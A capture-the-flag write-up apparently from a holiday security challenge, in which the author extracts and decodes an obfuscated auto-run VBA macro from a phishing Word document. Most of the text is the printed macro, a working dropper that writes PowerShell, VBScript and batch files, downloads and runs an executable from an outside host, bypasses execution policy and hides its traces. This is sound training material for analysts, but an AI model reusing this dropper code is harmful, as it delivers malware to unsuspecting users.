Skip to main content

Day 4: Giveaway

challenge description
Santa's SOC team is working overtime during December due to Christmas phishing campaigns. 
A new team of malicious actors is targeting mainly those affected by the holiday spirit.
Could you analyse the document and find the command & control server?

Give what away?

Only a Word document is provided. Obviously, some Macro commands must have been hidden in the document which is activated upon opening the file.

We can use a nice Python tool oletools to obtain the Macro commands.

Sub Auto_Open()
h
End Sub
Sub h()
Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
USER = Environ("username")
PST1 = "adobeacd-update.p" + Chr(115) + "1"
BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t"))
ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
VBT1 = "adobeacd-update." + Chr(118) + "bs"
VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s"


MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
XPFILEDIR = "c:\Windows\Temp\" + VBTXP
XPBARTFILEDIR = "c:\Windows\Temp\" + BART

On Error Resume Next
SetAttr MY_FILENDIR, vbNormal

If (Len(Dir(MY_FILENDIR)) <> 0) Then
Kill MY_FILENDIR
End If

On Error Resume Next
SetAttr MY_FILEDIR, vbNormal
If (Dir(MY_FILEDIR) <> "") Then
Kill MY_FILEDIR
End If

On Error Resume Next
SetAttr MY_FILDIR, vbNormal
If (Dir(MY_FILDIR) <> "") Then
Kill MY_FILDIR
End If

On Error Resume Next
SetAttr XPFILEDIR, vbNormal
If (Dir(XPFILEDIR) <> "") Then
Kill XPFILEDIR
End If

Dim FileNumber As Integer
Dim FileNumb As Integer
Dim FileNu As Integer
Dim mttt As Integer
Dim retVal As Variant
'Dim winver As Integer
FileNumber = FreeFile
FileNumb = FreeFile
FileNu = FreeFile

Dim objWMIService As Variant
Dim colOperatingSystems As Variant
Dim objOperatingSystem As Variant
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem In colOperatingSystems
SysReport = SysReport & "The operating system on this computer is " & _
objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
Next

Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem In colOperatingSystems
winverstr = objOperatingSystem.Version
Next


winver = Val(winverstr)
WaitFor (1)


If (winver > 5.5) Then
Open MY_FILENDIR For Output As #FileNumber
Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';"
Print #FileNumber, "$hash = '0';"
Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
Print #FileNumber, "$url = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
Print #FileNumber, "Start-Sleep -s 15;"
Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
Close #FileNumber

Open MY_FILDIR For Output As #FileNumb
Print #FileNumb, "Dim dff"
Print #FileNumb, "dff = 68"
Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
Close #FileNumb

Open MY_FILEDIR For Output As #FileNu
Print #FileNu, "@echo off"
Print #FileNu, "ping 1.1.2.2 -n 2"
Print #FileNu, "chcp 1251"
Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
Print #FileNu, "exit"
Close #FileNu

SetAttr MY_FILENDIR, vbNormal
SetAttr MY_FILEDIR, vbNormal
SetAttr MY_FILDIR, vbNormal

WaitFor (1)

retVal = Shell(MY_FILEDIR, 0)
End If

If (winver <= 5.5) Then
Open XPBARTFILEDIR For Output As #FileNu
Print #FileNu, "@echo off"
Print #FileNu, "ping 1.1.2.2 -n 2"
Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
Print #FileNu, "ping 1.1.2.2 -n 2"
Print #FileNu, "c:\Windows\Temp\444.exe"
Print #FileNu, ":loop"
Print #FileNu, "ping 1.1.2.2 -n 1"
Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
Print #FileNu, "exit"
Close #FileNu
WaitFor (2)
mttt = 88

Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String

HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
FVpHoEqBKnhPO = Replace("christmas", "i", "1")
FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)

Open XPFILEDIR For Output As #FileNumber
Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"

Print #FileNumber, "objXMLHTTP.send() "
Print #FileNumber, "If objXMLHTTP.Status = 200 Then"

Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "

Print #FileNumber, "objADOStream.Open "
Print #FileNumber, "objADOStream.Type = 1"
Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
Print #FileNumber, "objADOStream.Position = 0 "
Print #FileNumber, "objADOStream.SaveToFile strTecation "
Print #FileNumber, "objADOStream.Close "
Print #FileNumber, "Set objADOStream = Nothing "
Print #FileNumber, "End if "
Print #FileNumber, "Set objXMLHTTP = Nothing"
Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
Close #FileNumber

WaitFor (1)

retVal = Shell(XPBARTFILEDIR, 0)


End If


findTest
secondTest
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "<" & "sel" & "ect>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "</s" & "ele" & "ct>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "<" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "</" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange


End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds

Do While Timer < SngSec
DoEvents
Loop

End Sub

Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub findTest()
Dim firstTerm As String
Dim secondTerm As String
Dim rrtt As Range
Dim selRange As Range
Dim selectedText As String

Set rrtt = ActiveDocument.Range
firstTerm = "<se" & "lect>"
secondTerm = "</sel" & "ect>"
ASKASAIEJ = "ask as8d j vnbnfghfthfth sad"
With rrtt.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
ASKUKKIEJ = "aasdlkasjdask as8d j vnbnfghfthfth sad"
rrtt.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = rrtt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
ASKSASADW = "asjldklas"
rrtt.Collapse direction:=wdCollapseStart
selRange.End = rrtt.Start
selectedText = selRange.Delete
End With
End Sub

Sub secondTest()
Dim firstTerm As String
Dim secondTerm As String
Dim myRanget As Range
Dim yytt As Range
Dim selRanget As Range
Dim selectedTextt As String

Set yytt = ActiveDocument.Range
firstTerm = "<in" & "box>"
secondTerm = "</in" & "box>"
ASKIEJSASAHBDJ = "ask as8d j asdasl;a adfsdvsdgsdfsdf sad"
With yytt.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
ASKIEJ = "ask as8d j vnbnfghfthfth sad"
yytt.Collapse direction:=wdCollapseEnd
ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a adfsdvsdgsdfsdf sad"
Set selRanget = ActiveDocument.Range
selRanget.Start = yytt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a adfsdvsdgsdfsdf sad"
yytt.Collapse direction:=wdCollapseStart
selRanget.End = yytt.Start
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub

There are multiple obfuscated code but the most prominent seems to be at the bottom where there are calls to a http address. Targeting that, we can use Python to simplify it. Viola!

p1 = "https://elvesfactory/" + "H" + chr(84) + "B" + "" + chr(123) + "" + chr(84) + "h" + "1" + chr(125 - 10) + "_" + "1s" + chr(95) + "4"
p2 = "_" + "present".replace("e", "3") + chr(85 + 10)
p3 = "everybody".replace("e", "3")
p3 = p3.replace("o", "0") + "_"
p4 = "w" + "4" + chr(110) + "t" + chr(115) + "_" + "f" + "0" + chr(121 - 7) + chr(95)
p5 = "christmas".replace("i", "1")
p5 = p5.replace("a", "4") + chr(119 + 6)

print(p1 + p2 + p3 + p4 + p5)

Flag

HTB{Th1s_1s_4_pr3s3nt_3v3ryb0dy_w4nts_f0r_chr1stm4s}